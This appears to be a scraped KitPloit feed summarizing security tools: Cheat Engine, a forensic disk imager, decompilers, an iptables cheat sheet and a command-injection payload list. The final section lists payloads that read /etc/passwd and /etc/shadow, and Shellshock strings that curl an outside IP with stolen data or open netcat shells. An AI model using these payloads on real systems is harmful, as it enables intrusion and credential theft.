Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5837 articles
Browse latest View live

Cheat Engine - A Development Environment Focused On Modding

$
0
0

Cheat Engine is an open source tool designed to help you with modifying single player games running under window so you can make them harder or easier depending on your preference(e.g: Find that 100hp is too easy, try playing a game with a max of 1 HP), but also contains other usefull tools to help debugging games and even normal applications, and helps you protect your system by letting you inspect memory modifications by backdoors and even contains some ways to unhide them from conventional means.

It comes with a memory scanner to quickly scan for variables used within a game and allow you to change them, but it also comes with a debugger, disassembler, assembler, speedhack, trainer maker, direct 3D manipulation tools, system inspection tools and more.

Besides these tools it also comes with extensive scripting support which will allow experienced developers to create their own applications with easy and share them with other people

For new users it is recommended to go through the tutorial(The one that comes with Cheat Engine, you can find it in your programs list after installing) and at least reach step 5 for basic understanding of the usage of Cheat Engine.


OSFClone - Open Source Utility To Create And Clone Forensic Disk Images

$
0
0

OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system. In addition to raw disk images, OSFClone also supports imaging drives to the open Advance Forensics Format (AFF), AFF is an open and extensible format to store disk images and associated metadata, and Expert Witness Compression Format (EWF). An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.


OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard disk. Boot into OSFClone and create disk clones of FAT, NTFS and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

OSFClone can create disk images in the dc3dd format. The dc3dd format is ideal for computer forensics due to its increased level of reporting for progress and errors, and ability to hash files on-the-fly.

Verify that a disk clone is identical to the source drive, by using OSFClone to compare the MD5 or SHA1 hash between the clone and the source drive. After image creation, you can choose from a range of compression options to reduce the size of the newly created image, increasing portability and saving disk space.


Use OSFClone to save forensic meta-data (such as case number, evidence number, examiner name, description and checksum) for cloned or created images.


PHP Security Check List

$
0
0

PHP: Hypertext Preprocessor is a web-based, server-side, multi-use, general-purpose, scripting and programming language that can be embedded in HTML. The PHP development, which was first created by Rasmus Lerdorf in 1995, is now being run by the PHP community.

The PHP programming language is still used by a large developer. It is the most known backend programming language. In PHP web applications this list called "php security check list" which security researchers should know.


HexRaysCodeXplorer - Hex-Rays Decompiler Plugin For Better Code Navigation

$
0
0
The Hex-Rays Decompiler plugin for better code navigation in RE process. CodeXplorer automates code REconstruction of C++ applications or modern malware like Stuxnet, Flame, Equation, Animal Farm ...
The CodeXplorer plugin is one of the first publicly available Hex-Rays Decompiler plugins. We keep updated this project since summer of 2013 and continue contributing new features frequently. Also most interesting feutures of CodeXplorer have been presented on numerous security conferences like: REcon, ZeroNights, H2HC, NSEC and BHUS.

Contributors:
Alex Matrosov (@matrosov)
Eugene Rodionov (@rodionov)
Rodrigo Branco (@rrbranco)
Gabriel Barbosa (@gabrielnb)

Supported versions of Hex-Rays products: everytime we focus on last versions of IDA and Decompiler because trying to use new interesting features in new SDK releases. It's also mean we tested just on last versions of Hex-Rays products and not guaranteed stable work on previous ones.

Why not IdaPython: all code developed on C/C++ because it's more stable way to support complex plugin for Hex-Rays Decompiler.

Supported Platforms: x86/x64 for Win, Linux and Mac.

HexRaysCodeXplorer - Hex-Rays Decompiler plugin for easier code navigation. Right-click context menu in the Pseudocode window shows CodeXplorer plugin commands:


Here are the main features of the CodeXplorer plugin:
  • Automatic type REconstruction for C++ objects. To be able to reconstruct a type using HexRaysCodeXplorer one needs to select the variable holding pointer to the instance of position independed code or to an object and by right-button mouse click select from the context menu «REconstruct Type» option:

The reconstructed structure is displayed in “Output window”. Detailed information about type Reconstruction feature is provided in the blog post “Type REconstruction in HexRaysCodeXplorer”.
Also CodeXplorer plugin supports auto REconstruction type into IDA local types storage.


  • Virtual function table identification - automatically identifies references to virtual function tables during type reconstruction. When a reference to a virtual function table is identified the plugin generates a corresponding C-structure. As shown below during reconstructing struct_local_data_storage two virtual function tables were identified and, as a result, two corresponding structures were generated: struct_local_data_storage_VTABLE_0 and struct_local_data_storage_VTABLE_4.

  • C-tree graph visualization– a special tree-like structure representing a decompiled routine in citem_t terms (hexrays.hpp). Useful feature for understanding how the decompiler works. The highlighted graph node corresponds to the current cursor position in the HexRays Pseudocode window:


  • Ctree Item View– show ctree representation for highlighted element:


  • Extract Ctrees to File– dump calculate SHA1 hash and dump all ctrees to file.


  • Extract Types to File– dump all types information (include reconstructed types) into file.
  • Navigation through virtual function calls in HexRays Pseudocode window. After representing C++ objects by C-structures this feature make possible navigation by mouse clicking to the virtual function calls as structure fields:


  • Jump to Disasm - small feature for navigate to assembly code into "IDA View window" from current Pseudocode line position. It is help to find a place in assembly code associated with decompiled line.


  • Object Explorer– useful interface for navigation through virtual tables (VTBL) structures. Object Explorer outputs VTBL information into IDA custom view window. The output window is shown by choosing «Object Explorer» option in right-button mouse click context menu:


Object Explorer supports following features:
  • Auto structures generation for VTBL into IDA local types
  • Navigation in virtual table list and jump to VTBL address into "IDA View" window by click
  • Show hints for current position in virtual table list
  • Shows cross-references list by click into menu on "Show XREFS to VTBL"


  • Support auto parsing RTTI objects:

The Batch mode contains following features:
  • Batch mode - useful feature to use CodeXplorer for processing multiple files without any interaction from user. We add this feature after Black Hat research in 2015 for processing 2 millions samples.
Example (dump types and ctrees for functions with name prefix "crypto_"):
idaq.exe -OHexRaysCodeXplorer:dump_types:dump_ctrees:CRYPTOcrypto_path_to_idb
Compiling:
Windows:
  • Open the solution in Visual Studio
  • Open file src/HexRaysCodeXplorer/PropertySheet.props in notepad(++) and update values of IDADIR and IDASDK paths to point to IDA installation path and IDA7 SDK path accordingly. HexRays SDK should be in $IDADIR\plugins\hexrays_sdk (like by default)
  • Build Release | x64 and Release x64 | x64 configurations
Linux:
  • cd src/HexRaysCodeXplorer/
  • IDA_DIR=<PATH_TO_IDA> IDA_SDK=<PATH_TO_IDA_SDK> EA64=0 make -f makefile.lnx
  • IDA_DIR=<PATH_TO_IDA> IDA_SDK=<PATH_TO_IDA_SDK> EA64=0 make -f makefile.lnx
Mac:
  • cd src/HexRaysCodeXplorer/
  • IDA_DIR=<PATH_TO_IDA> IDA_SDK=<PATH_TO_IDA_SDK> make -f makefile.mac
  • The Mac makefile might need some hand editing, pull requests welcome!
  • IDA 7.0 .pmc file extension should be .dylib
  • bash$ export IDA_DIR="/Applications/IDA\ Pro\ 7.0/ida.app/Contents/MacOS" && export IDA_SDK="/Applications/IDA\ Pro\ 7.0/ida.app/Contents/MacOS/idasdk" && make -f makefile7.mac
  • Or open project in Xcode HexRaysCodeXplorer.xcodeproj

Conference talks about CodeXplorer plugin:
  • 2015
  • "Distributing the REconstruction of High-Level IR for Large Scale Malware Analysis", BHUS [slides]
  • "Object Oriented Code RE with HexraysCodeXplorer", NSEC [slides]
  • 2014
  • "HexRaysCodeXplorer: object oriented RE for fun and profit", H2HC [slides]
  • 2013
  • "HexRaysCodeXplorer: make object-oriented RE easier", ZeroNights [slides]
  • "Reconstructing Gapz: Position-Independent Code Analysis Problem", REcon [slides]


Iptables Essentials - Common Firewall Rules And Commands

$
0
0
Tools to help you configure Iptables
  Shorewall - advanced gateway/firewall configuration tool for GNU/Linux.
  Firewalld - provides a dynamically managed firewall.
  UFW - default firewall configuration tool for Ubuntu.
  FireHOL - offer simple and powerful configuration for all Linux firewall and traffic shaping requirements.

Manuals/Howtos/Tutorials
  Best practices: iptables - by Major Hayden
  An In-Depth Guide to Iptables, the Linux Firewall
  Advanced Features of netfilter/iptables
  Linux Firewalls Using iptables
  Debugging iptables and common firewall pitfalls?
  Netfilter Hacking HOWTO
  Per-IP rate limiting with iptables

How it works?


Iptables Rules

Saving Rules

Debian Based
netfilter-persistent save

RedHat Based
service iptables save

List out all of the active iptables rules with verbose
iptables -n -L -v

List out all of the active iptables rules with numeric lines and verbose
iptables -n -L -v --line-numbers

Print out all of the active iptables rules
iptables -S

List Rules as Tables for INPUT chain
iptables -L INPUT

Print all of the rule specifications in the INPUT chain
iptables -S INPUT

Show Packet Counts and Aggregate Size
iptables -L INPUT -v

To display INPUT or OUTPUT chain rules with numeric lines and verbose
iptables -L INPUT -n -v
iptables -L OUTPUT -n -v --line-numbers

Delete Rule by Chain and Number
iptables -D INPUT 10

Delete Rule by Specification
iptables -D INPUT -m conntrack --ctstate INVALID -j DROP

Flush All Rules, Delete All Chains, and Accept All
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X

Flush All Chains
iptables -F

Flush a Single Chain
iptables -F INPUT

Insert Firewall Rules
iptables -I INPUT 2 -s 202.54.1.2 -j DROP

Allow Loopback Connections
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

Allow Established and Related Incoming Connections
iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

Allow Established Outgoing Connections
iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Internal to External
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

Drop Invalid Packets
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Block an IP Address
iptables -A INPUT -s 192.168.252.10 -j DROP

Block and IP Address and Reject
iptables -A INPUT -s 192.168.252.10 -j REJECT

Block Connections to a Network Interface
iptables -A INPUT -i eth0 -s 192.168.252.10 -j DROP

Allow All Incoming SSH
iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow Incoming SSH from Specific IP address or subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow Outgoing SSH
iptables -A OUTPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow Incoming Rsync from Specific IP Address or Subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 873 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming HTTP
iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 80 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming HTTPS
iptables -A INPUT -p tcp --dport 443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 443 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming HTTP and HTTPS
iptables -A INPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --dports 80,443 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow MySQL from Specific IP Address or Subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 3306 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 3306 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow MySQL to Specific Network Interface
iptables -A INPUT -i eth1 -p tcp --dport 3306 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth1 -p tcp --sport 3306 -m conntrack --ctstate ESTABLISHED -j ACCEPT

PostgreSQL from Specific IP Address or Subnet
iptables -A INPUT -p tcp -s 192.168.240.0/24 --dport 5432 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 5432 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow PostgreSQL to Specific Network Interface
iptables -A INPUT -i eth1 -p tcp --dport 5432 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth1 -p tcp --sport 5432 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Block Outgoing SMTP Mail
iptables -A OUTPUT -p tcp --dport 25 -j REJECT

Allow All Incoming SMTP
iptables -A INPUT -p tcp --dport 25 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 25 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming IMAP
iptables -A INPUT -p tcp --dport 143 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 143 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming IMAPS
iptables -A INPUT -p tcp --dport 993 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 993 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming POP3
iptables -A INPUT -p tcp --dport 110 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 110 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Allow All Incoming POP3S
iptables -A INPUT -p tcp --dport 995 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 995 -m conntrack --ctstate ESTABLISHED -j ACCEPT

Drop Private Network Address On Public Interface
iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

Drop All Outgoing to Facebook Networks
Get Facebook AS:
whois -h v4.whois.cymru.com " -v $(host facebook.com | grep "has address" | cut -d " " -f4)" | tail -n1 | awk '{print $1}'
Drop:
for i in $(whois -h whois.radb.net -- '-i origin AS32934' | grep "^route:" | cut -d ":" -f2 | sed -e 's/^[ \t]*//' | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | cut -d ":" -f2 | sed 's/$/;/') ; do

iptables -A OUTPUT -s "$i" -j REJECT

done

Log and Drop Packets
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j LOG --log-prefix "IP_SPOOF A: "
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP
By default everything is logged to /var/log/messages file:
tail -f /var/log/messages
grep --color 'IP SPOOF' /var/log/messages

Log and Drop Packets with Limited Number of Log Entries
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -m limit --limit 5/m --limit-burst 7 -j LOG --log-prefix "IP_SPOOF A: "
iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP

Drop or Accept Traffic From Mac Address
iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP
iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT

Block or Allow ICMP Ping Request
iptables -A INPUT -p icmp --icmp-type echo-request -j DROP
iptables -A INPUT -i eth1 -p icmp --icmp-type echo-request -j DROP

Specifying Multiple Ports with multiport
iptables -A INPUT -i eth0 -p tcp -m state --state NEW -m multiport --dports ssh,smtp,http,https -j ACCEPT

Load Balancing with random* or nth*
_ips=("172.31.250.10" "172.31.250.11" "172.31.250.12" "172.31.250.13")

for ip in "${_ips[@]}" ; do
iptables -A PREROUTING -i eth0 -p tcp --dport 80 -m state --state NEW -m nth --counter 0 --every 4 --packet 0 \
-j DNAT --to-destination ${ip}:80
done
or
_ips=("172.31.250.10" "172.31.250.11" "172.31.250.12" "172.31.250.13")

for ip in "${_ips[@]}" ; do
iptables -A PREROUTING -i eth0 -p tcp --dport 80 -m state --state NEW -m random --average 25 \
-j DNAT --to-destination ${ip}:80
done

Restricting the Number of Connections with limit and iplimit*
iptables -A FORWARD -m state --state NEW -p tcp -m multiport --dport http,https -o eth0 -i eth1 \
-m limit --limit 20/hour --limit-burst 5 -j ACCEPT
or
iptables -A INPUT -p tcp -m state --state NEW --dport http -m iplimit --iplimit-above 5 -j DROP

Maintaining a List of recent Connections to Match Against
iptables -A FORWARD -m recent --name portscan --rcheck --seconds 100 -j DROP
iptables -A FORWARD -p tcp -i eth0 --dport 443 -m recent --name portscan --set -j DROP

Matching Against a string* in a Packet's Data Payload
iptables -A FORWARD -m string --string '.com' -j DROP
iptables -A FORWARD -m string --string '.exe' -j DROP

Time-based Rules with time*
iptables -A FORWARD -p tcp -m multiport --dport http,https -o eth0 -i eth1 \
-m time --timestart 21:30 --timestop 22:30 --days Mon,Tue,Wed,Thu,Fri -j ACCEPT

Packet Matching Based on TTL Values
iptables -A INPUT -s 1.2.3.4 -m ttl --ttl-lt 40 -j REJECT

Protection against port scanning
iptables -N port-scanning
iptables -A port-scanning -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s --limit-burst 2 -j RETURN
iptables -A port-scanning -j DROP

SSH brute-force protection
iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set
iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP

Syn-flood protection
iptables -N syn_flood

iptables -A INPUT -p tcp --syn -j syn_flood
iptables -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN
iptables -A syn_flood -j DROP

iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j ACCEPT

iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j LOG --log-prefix PING-DROP:
iptables -A INPUT -p icmp -j DROP

iptables -A OUTPUT -p icmp -j ACCEPT

Mitigating SYN Floods With SYNPROXY
iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Block New Packets That Are Not SYN
iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
or
iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP

Force Fragments packets check
iptables -A INPUT -f -j DROP

XMAS packets
iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP

Drop all NULL packets
iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP

Block Uncommon MSS Values
iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP

Block Packets With Bogus TCP Flags
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,FIN FIN -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL ALL -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,FIN,PSH,URG -j DROP
iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

Block Packets From Private Subnets (Spoofing)
_subnets=("224.0.0.0/3" "169.254.0.0/16" "172.16.0.0/12" "192.0.2.0/24" "192.168.0.0/16" "10.0.0.0/8" "0.0.0.0/8" "240.0.0.0/5")

for _sub in "${_subnets[@]}" ; do
iptables -t mangle -A PREROUTING -s "$_sub" -j DROP
done
iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP


Reko - A General Purpose Binary Decompiler

$
0
0

Reko (Swedish: "decent, obliging") is a C# project containing a decompiler for machine code binaries. This project is freely available under the GNU General Public License.
The project consists of front ends, core decompiler engine, and back ends to help it achieve its goals. A command-line, a Windows GUI, and a ASP.NET front end exist at the time of writing. The decompiler engine receives inputs from the front ends in the form of either individual executable files or decompiler project files. Reko project files contain additional information about a binary file, helpful to the decompilation process or for formatting the output. The decompiler engine then proceeds to analyze the input binary.
Reko has the ambition of supporting decompilation of various processor architectures and executable file formats with minimal user intervention. For a complete list, see the supported binaries page.
Please note that many software licenses prohibit decompilation or other reverse engineering of their machine code binaries. Use this decompiler only if you have legal rights to decompile the binary (for instance if the binary is your own.)

Downloading Reko
Official releases are published every few months on Github and SourceForge. Users who can't or won't build Reko themselves can download the output of the AppVeyor integration builder. Naturally you can build the project from the sources: see "Hacking" below.

Installing Reko

Windows users
The following prerequisite software must be installed on your machine first:
Download an MSI file from one of the places mentioned above, then simply run the installer.

Non-Windows users
The following prerequisite software must be installed on your machine first:
Note: we've been unable to test Reko with the most recent version of mono, 5.16.0, because a bug in said version makes it impossible to build. This has been reported in mono/mono#11663.
After installing mono, you can proceed by either downloading binaries directly from the integration build server, or by building Reko from sources (see Hacking below).

Documentation
To get acquainted with Reko's various features, you can read the user's guide. If you're interested in the internal workings of the project, see the wiki.

Getting support
You can report any issues you encounter or ask any Reko-related question on the issue tracker. You can also try the Reko Gitter.im chatroom. Reko is built by volunteers' efforts on their spare time, so adjust your response-time expectations accordingly.

Hacking
To build reko, start by cloning https://github.com/uxmal/reko. You can use an IDE or the command line to build the solution file Reko-decompiler.sln. If you are an IDE user, use Visual Studio 2017 or later, or MonoDevelop version 5.10 or later. If you wish to build using the command line, use the command
msbuild Reko-decompiler.sln
(provided you have msbuild installed). All external dependencies needed to build Reko are included in the external directory.
Note: please let us know if you still are not able to compile, so we can help you fix the issue.
If you're interested in contributing code, see the road map for areas to explore. The Wiki has more information about the Reko project's internal workings. Please consult the style guide.

Warnings and errors related to WiX
You will receive warnings or errors when loading the solution in Visual Studio or MonoDevelop if you haven't installed the WiX toolset on your development machine. You can safely ignore the warnings; the WiX toolset is only used when making MSI installer packages, and isn't even supported in MonoDevelop. You will not need to build an installer if you're already able to compile the project: the build process copies all the necessary files into If you do want to build an MSI installer with the WiX toolchain, you can download it here: http://wixtoolset.org/releases/

How do I start Reko?
The solution folder Drivers contains the executables that act as user interfaces: the directory WindowsDecompiler contains the GUI client for Windows users; MonoDecompiler contains the GUI client for Mono users; CmdLine is a command line driver.


Command Injection Payload List

$
0
0

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code.

What is OS command injection?
OS command Injection is a critical vulnerability that allows attackers to gain complete control over an affected web site and the underlying web server.
OS command injection vulnerabilities arise when an application incorporates user data into an operating system command that it executes. An attacker can manipulate the data to cause their own commands to run. This allows the attacker to carry out any action that the application itself can carry out, including reading or modifying all of its data and performing privileged actions.
In addition to total compromise of the web server itself, an attacker can leverage a command injection vulnerability to pivot the attack in the organization's internal infrastructure, potentially accessing any system which the web server can access. They may also be able to create a persistent foothold within the organization, continuing to access compromised systems even after the original vulnerability has been fixed.

Description :
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.

Remediation:
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
  • The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
  • The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate

Unix :
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
;id;
;id
;netstat -a;
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id

Windows :
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d
%0Acat%20/etc/passwd
%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
